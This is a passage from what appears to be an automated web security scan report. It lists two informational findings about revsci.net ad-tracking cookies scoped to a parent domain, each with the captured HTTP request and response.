rlu/2tLehzFpRXk/GzZs8sRmO5m/UL+mJwfJFt+GZGWtRj28WoNIhdg7Dck3SCcOQ7jyC0o6TCr/lI38SE0Nnwss3q/JIny1jW86pRUk9hQqRyVix1oV9r2Qolj1ViIs859koctlOqCEAfKQBCU+7oodZ2cqnPQeriSAnJcHtd/u42V8Fx0zVzXFuy1XBvHx1EC45W20tb+S4y/u3TP4a9+NsWv5waghX7HsYa878dEmhTeZWnwbRwB5f5aQLPK0JfmnuS/oBn/cbiTz4pvqHuvLDwpDSgXpuTBhBXScyPL18llD2S9yq0qPwJovdJl5N85ek9tmSm04l2V+FpSte5D286eCfuoZm71IG1806bNXAHWKARnkGyyVXANVJr9Uv55+Ub3SYAecwTyZGJMV8tSI1bBnC2aB/5gAgR+gs0sK050JWuWpAMPEXrAPBEylB3N9eVbQ/DiyS8SX9YR2b7B/BhV+GzeXq9waTV68Q7qCiet/oxenS5f8N/vEo+Jqk8R87ElBQffEX8A3imi//ZARoY=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:45 GMT

GIF89a.............!.......,...........D..;
9.69. http://pix04.revsci.net/I10982/b3/0/3/1003161/448768738.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I10982/b3/0/3/1003161/448768738.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I10982/b3/0/3/1003161/448768738.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.nme.com%252Fnews%252Fsufjan-stevens%252F56527%253F_rsiL%253D0%26DM_EOM%3D1&C=I10982 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==; rsiPus_--QM="MLsXrqMOJjhroJB0OsFGTywSQa5gE3bzGLWC77EYlL0V6PUwpFqMKfRo/WIjxatotGUBLfh18Iw7W+qkAQ46bVHoTrv1pQwNKjjgNCNHJPbpAgH4IzR/+iRbVue91oXW/jKsDPa7vbvxtrd33fHq34yrFQuJku+bgm+8EVffudcKN4iuBvrN90qHeI4xaY/Q1W1yNsL5KOlsGxNqhUiNOXe5nn986aJ67S/0tULtWPdrG3lhpPsdb8xO/n/lB581aDn762WB0ihbZBOeu3Ufx+HpLRh+8Hbf0zZq8pfGKCS0hlRrIAabwnKXGJwRIMywuWQPjThCbo0KSSFQIP4mo76IAHMZnYNH0tuqRyB/AEZngSZCLfLYF3Zs5g4nZoGO0cohFtEneaCcGDtskRpSY+dP7h0gnUP0L7R7A/8xlqSZ/W2KkRpVIhjwQAOTk48sJD1PxXjX0x5XdtsfLihcm9VuIUiHpGRUF7F/idal7Hq+0pROgbBT6KCcol1snnTV0V5F0xpBZk6CRy2ugCPvNan6L1McQFvgbXEKldtpFMfuZakR635XR4x1RXCLCkkxUCfQPGc6mBZWiKgoRHEO3b0otALBdNCIIFAiSKxefi0nPrtknQ3EMXhwwvPIzXKIQsOaoEWNpAIcShIHiDOF3qSKWFuDqkb2jqtMxvBdfAVFP7NcbvzKM+3/ueqaVRMDxCeeJ+flWQpzF+qS4BrI4Dt7AUZJ2EeFM4m41UyM+T7FSi5tA/qwqOwo4kK2gHpUVKssP2I+Ee7LhGobkwOJUOMfgbzVozWgQuSKoq5kZ88M185NbAGUupiqDKHqMcj+dBKc9fPP3KK+5EXLdrvEPS5YK+cSdBxxlTzlrYRJ3wJXAiV2dnrBaaQP+zIJOpgPpvL1xtxxrkjB56lwuYrzB2bgI6uI/AireNneSB71/kJavLpmOV3ZKyXlMBYkfyXB8qTG0Uev1gg9C57Wn8epqz8lCu0573dEnu71OAvS2jhxt+Kw6FPI+tTiLCxWwwjS81QgDUZk9v3k6axNYh2OWMWlOaV+U8pWNdAebenCcqc="; rsi_us_1000000="pUM1Iz9HMAYU1O2uQ6agQvHtomeq75Ig4g4EmJ/A6n4WsknjQhUq8iBul7F68iFx8cqm3SO9eaFvyn1GBw/eJPslZlA8PhpTTZGsXb7RjDc/iMgnjkeolupj4fLTEQPVKscYxoDVuEdJuZbaK3D9xPuOIhlowTJ+ya38j5p4Ta6Bz/HWeH0nosUPna7vHxaZ5XoL5l/dnmXwpPm5VWpbUOslRA5BxSe4ZOkSE9PAmD2iQJPexlX0wmcIAbK7tsGmzGATNf80Fqyl751/l8juNUu0JNYEx45nWIRv/C8BOiTiJbO5g8IGAzpcI40V+UQZmhqEPeeEc1fCQnI0TCPjgkID7R2wwigMSHt5VUBgTb+NyMxPLwLONDY3TuokJnmzHPnnRDkuVRiS5+Uyz4YpGNKGlhaPSdZ9n4EB3wX0uvpMSNK4Fmo9jIaSj+ncTHidAXiIgQDfusP6TCa9QdU2bznEQzcv9BCophz20fJ1WW+kENTBipABVnZA56YjECEEY3phD1JQzHGdVrVseyuEk6GWi92FSiGLJ4812+Br34U7q3VQBxTRSEt04mb9b+Nu053VTtbctHkK68djsAFkE74d8kPDFLOH8lRboZwLXX6HqUXD02RKMs5PWsH+ziouWDQYmVb8hZ/ecArQiVYBI4aPw+kfQuXmbioB2aEC0lxOEpHD/Ns9MsBpCzc5UqHnCYeRcpcYLhhYm4BPjPFrgYw8D4NABb/5+fzD8h2U3LvMxcVcLWdaMX4aKoPVH+KL74p/EdmylBc1de/czv/dSpACqyj0uifAEyPR50aV9cwCBjohIoFo9EOMVH6RMd7onZ55R4I4FSIgeCRK0c4wgNxjTMXno77nWOf381e4nnQbO463zH1b2jgH0FmsgwCxBKR5LsbHEUqdx0oVuJzssP3YK75lqpQheuu3QYCc6leVSJ0morqXGrRuMXQbQrgyVMCQgz3qL/OFP/kN/cJMZe6ViH5t1Gdp7bjk4yCudY/fH/RWKgw9ywS7g4LBjxX2XrVDkyrkyMkUeGj92tKDN3nwYWN2isOHQc0tZtLOL/8WEUOseW6PUtOc7HPHXkhurCilOyFhqPwtVkrNV9iwiE6/OEwXFDX/aXR9ceCoOAiQkffNc/FhNzpBQE1u8u3E6JnrXkfFsNN0SqpfDvGaQnlA5yxO+k/zo/hv8QT1f8yC4/H0b0V3oZQU62XPrD2wB5Kv4sv8RmzGKE7qz8BL2mQX29agkU8ECTuBwmAb6UIzgDgLdezAM7zWMEN9lNvnbyEhVz4KlJteKeaP6JM8QWkSqGwqE4JwqHmmDFepCsQRHRGrBiMwJA76NRpMK59CxAt0fbzHEYqA+JmFKmMDiGhSr7vA0le7ggiHcPnY4yw16dWwbcJEsbg9ulXJ4JGMYgnw7KoKzVD4RSJBC230sX+mBeGHoQSxN08MTZ+4NCxPZspf/4y9JLqybhHYnhyK+r/gBv5lHBLh2Qjg3gH9Ms4jvQ6ewPsqEIGFdCBtnIuWzVKiX5T6glm3a6fLZrlR/OoU"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Wdkl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z4Oss1gLZjumZlkn0IsTQ0mXYWnkGNdTd0q7tfEV6W8KaA3WTv2SKVvoFps/JP+0YKGP4FVfVmNFbbEBVo2TvwxyI3eOkiCXmElzZ+zqlLEAHcyxHntH2W3rV/P/bewx/MpTmnj0Shaa+7AEiTL+o1cf+UTe9ucpdpLtFxxiSKRpIbr9tHjiUe8+1Vo8ajppHmmGlgcGjk9iXdch2jqc0+EIC7XHgoe52DlwgGaLkVNJbb65JjWHngta9bCG7qqwHxg/HhHfrMhV1qOIlK69wvP0uiSL3TvDIIzaG7pKOGWspWpDShSS+EO2T6H9ABaQ8GSfB4NPz5Gd4GmO8WVU0yjzYmO6gaVMjz6TZUYu66LMc5LTZ1wwmciXF0E7InfKXKBUa79FbqAzB8mGblMSLCBZp0yo5CPcJOyGSwutSBWax2+C3V+iL/LNwVEWhzNzJhOKK5ncfiUQrMMkf9FURDR/z6pVMmACLu1Ew37/uS1PeyZqwSqM6PkjwJaViHsjAyy5tP; Domain=.revsci.net; Expires=Tue, 08-May-2012 14:01:00 GMT; Path=/
Set-Cookie: NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd9c&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 14:01:00 GMT; Path=/
Set-Cookie: rtc_7_f3=MLvn9yUVZjpnpsoVwxtUaAgBXM1ocLKpZkLem1XJimjUNmWkLuW+Q3IYAcHCWGbufeXNaSBtbG5g5lLo7eYML1bRrFjZ8GZkY1DoUVQ3JAFkNwLoqysQx52jEC2lMqa7ifpThxs7FyNvveFNtEn7NSMcJ2SH/j03Jmzm6B9e1KoIieaD6fQiz+SI37JiXn8z7XtHZMFtt272+/QzRcdgnWOdJNCjqAIeNphuktNAVr/HDP/YSOQy3kkr4NUHjvkkUrhr7WbzSfqA1MvgxrBz9iRzXradVJPn0fdOzB0+msOFqupVxy37ALlnnzDoASz2U1OcgEgeG+WV8hzBhWSJXDBRzrKIOwxeaBOhkrCzhdMeGy4zG0FAj/O7/Tu0HXAgyamecYsUt5hoqKvSCuPG66sWNIjOQ09Az4HEmltEiHlQr42e0xSoaGP6pj6u/ug4j6qm9remPZasxkhCsw9rRJ9xzsLQ16/+c7iYQzwO2wI1sFxOFTgcF0rJsrH2RLNC8zcxLWr7KlfpB4ZLpKqqojzY0pJoe6N7Jt9YwmtLLrOAizP57gse9Rf8AI2yMPD3HMDiws58WpQgTmSfCd5s849ALAy0/kJyEC7kKGH5i0xoELx4cqoVQ8sGsuzfEJVNiA2FBxgVaPTkScHKYeuHIbKaLzFeQMqiZqzQCKL2DYQJxKRmfoP6lY/yoowlXy8dWrI2rGMXIzCo4oWBDSOxiHHqc1vo5g0W/Z9+g6YgWZoZ4G8ilolPjmfRgn7f2YPFdUVTixjywHsRBmqnWfr/PD9ehQ8B+t6OIuhGnnKgcA/iX6iaRaDg63Eq9HTcrRpXFVmwrz7VSWUX4sbZYJs7DNbc8J/t7+QY4D/RX/xrzQUR2W1Tn07RWTUTmlXISziIN5UNDQ9c03yJaRCnjVmHY9hAmW6dpVqXeUwbjGOVxwmecpOnbSpTq5xE0CRdxnHf4QStwrBwr/FKMd+a/dBlwEolGm1HvaEG0pICWzDZ2hVeeNJuEhwOZNshSeEUgaPJ879t2sA4qw5UV0j+Uc/IMRHzohx8g8WAIRJTsBuIxSKmpu+dZF8fZTeKv9bgD6eb+qxB4yKhRhen4I/qhGIj1Oci6tXfQjOUl3SzFg8Py4Oa/werp4xtvN1s84DdhcC0lR5fOCLS9b3G7+5aCcNnvrv/8NrCS/jTxyCHoj6vbo6mX1e4X/mjJw18iYOhaB802RsdGuNUg7D+231yHlu7JjTrvjF4++snwjnDi+CXlNxQOXbD7J5T/1z2qnvDRf7JDT4X8vtlPKY4/BdnbD+DpcAImn1g/AbomaIYfPJC6/0PndODqXMddNA6iDqg0WeIYc49DHKdW5OdtG/l11ugUI5rv3Ccbxdj9KbpB64syn6ZNpuyTMEqjmtmryNrax42/C1cTdhfnyeENrLnWHnGSGmfQNDGc4ND4vvSPvv+/1gkpHRWdiKz3v0CdKoxFR2a7pwgDt0NwqyKAwz1S9PYQv7+jHRkMmS09BnmnxT35jy6qxR+h04rxWldh5Nb9tSFd/y3nVbhUpxclD8C3Jf2jy14PUdYBrHSBwobp86iS7Sr0pfxpJ6yYBXqqFvEaacobjsgOaJG5ArH7VjPz+nb/eolY3GQXiZYXpl8rs35wPJx/m/RdY5HFaYpj97Mc+LacQ7fPn4nGXobGuPcdPKLmjpy9e3RaQwhbNH1rI5TWZ6jzhyfYG1T8PMbysEIpJnvca7MpjiwPpTLBaMGft0wmEw5hmow3P2ZAAzZmHGNZMBN; Domain=.revsci.net; Expires=Tue, 08-May-2012 14:01:00 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:01:00 GMT
Content-Length: 671

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3
...[SNIP]...
9.70. http://pix04.revsci.net/J06575/a4/0/0/pcx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp